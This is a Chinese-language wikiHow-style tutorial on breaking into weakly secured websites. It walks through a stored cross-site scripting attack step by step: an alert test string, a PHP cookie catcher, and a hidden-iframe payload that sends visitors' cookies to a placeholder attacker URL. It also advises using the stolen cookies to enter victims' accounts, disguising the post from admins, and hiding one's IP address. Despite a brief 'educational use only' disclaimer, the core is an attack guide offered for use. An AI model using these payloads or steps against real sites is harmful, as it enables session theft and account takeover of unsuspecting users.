下载PDF文件下载PDF文件X
How.com.vn是一个“多人协作写作系统”,因此我们的很多文章都是由多位作者共同创作的。 为了创作这篇文章,32位用户(部分匿名)多次对文章进行了编辑和改进。
这篇文章已经被读过135,162次。
注意:这篇指南文章只作教育用途,应该用在正当的入侵测试上,用来提升网站的安全性。这篇指南文章会教你如何一步步入侵安全性低的网站。
步骤
找个安全性低的可以发帖的网站。比如可以发布信息帖子的网站。注意,如果网站安全性强,下面入侵方法就不起作用。
创建帖子。要在帖子内容中输入一些内容,这样不管谁点击了帖子,数据都会被窃取。- 你可以测试一下,看看该网站系统会不会过滤代码。在帖子中输入<script...>alert(“test”)</...script> (把句点删掉)。如果点击帖子的时候,会出现一个警告窗口,说明站点易受攻击。
创建并上传cookie捕捉器。本攻击的目的是窃取用户的cookie内容,通过cookie内容,你就可以轻松登录安全性弱的网站,进入对方的账户。这里你需要准备cookie捕捉器(某种代码),这个代码会捕捉用户的cookie并转发出去,你可以给一个可以登录的,又支持PHP网页的网站上传一个捕捉器。例子里有个cookie捕捉器供参考。
将帖子和cookie捕捉器一起发布出去。输入一定的代码,就可以让帖子抓取用户的cookie,并发送到你的网站中去。你需要在代码之后输入一些文字,减少访客的怀疑,并减少管理员删帖的几率。- cookie捕捉器的例子:<...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”YOURURL/cookiecatcher.php?c=”+document.cookie)><.../iframe>(将句点删掉。)
使用抓取的cookies。之后就可以将抓取的cookie发送到你的网站,你可以随意使用对方的cookies了。广告
学一两种编程语言。要是你想要真正掌握破解网站的本质方法,你得了解电脑和各种互联网运行的方式。可以学一两种像Python或SQL的编程语言,这样你就可以更好地掌控电脑,找出网站系统中的脆弱点了。
学好HTML基础知识。你也需要对HTML和javascript有很好的了解,这样就能针对性地破解某些网页了。这些代码需要一段时间的学习,不过网上有很多很好的学习资料,要是你仔细找的话,不愁找不到的。
咨询白帽黑客。白帽黑客是身具黑客知识,把能力发挥在正当之处的特殊黑客。白帽黑客会曝光安全漏洞,还会让互联网更稳定实用。要是你也想发挥正义的力量,或者想保护自家网站的安全,你可以咨询一些白帽黑客了解一些建议。
做做研究。想了解怎么入侵网站,或者想要保护自己的网站,你需要做很多研究工作。网站受攻击的方式有很多种的,所以要坚持学习相关知识。
保持更新。因为网站的入侵方式也在不断变化,你要确保自己跟上最前沿的相关知识。一种攻击奈何不了你,不代表你就没有其他漏洞了!广告
小提示
- 访问黑客论坛,了解各种有用的技巧。
广告
警告
- 要是你在现实生活中尝试入侵网站,用一些软件掩盖住你的IP地址。
- 光读这篇网站,是不能让你瞬间变为一名黑客的。你一定要多涉猎各种知识,多多练习,才能成功。
- 入侵网站绝对是非法的。如果入侵网站责任在你,你一定会惹上法律问题。
广告
参考
这篇文章对你有帮助吗?
⚠️ Disclaimer:
Content from Wiki How 中文 language website. Text is available under the Creative Commons Attribution-Share Alike License; additional terms may apply.
Wiki How does not encourage the violation of any laws, and cannot be responsible for any violations of such laws, should you link to this domain, or use, reproduce, or republish the information contained herein.
- - A few of these subjects are frequently censored by educational, governmental, corporate, parental and other filtering schemes.
- - Some articles may contain names, images, artworks or descriptions of events that some cultures restrict access to
- - Please note: Wiki How does not give you opinion about the law, or advice about medical. If you need specific advice (for example, medical, legal, financial or risk management), please seek a professional who is licensed or knowledgeable in that area.
- - Readers should not judge the importance of topics based on their coverage on Wiki How, nor think a topic is important just because it is the subject of a Wiki article.
广告
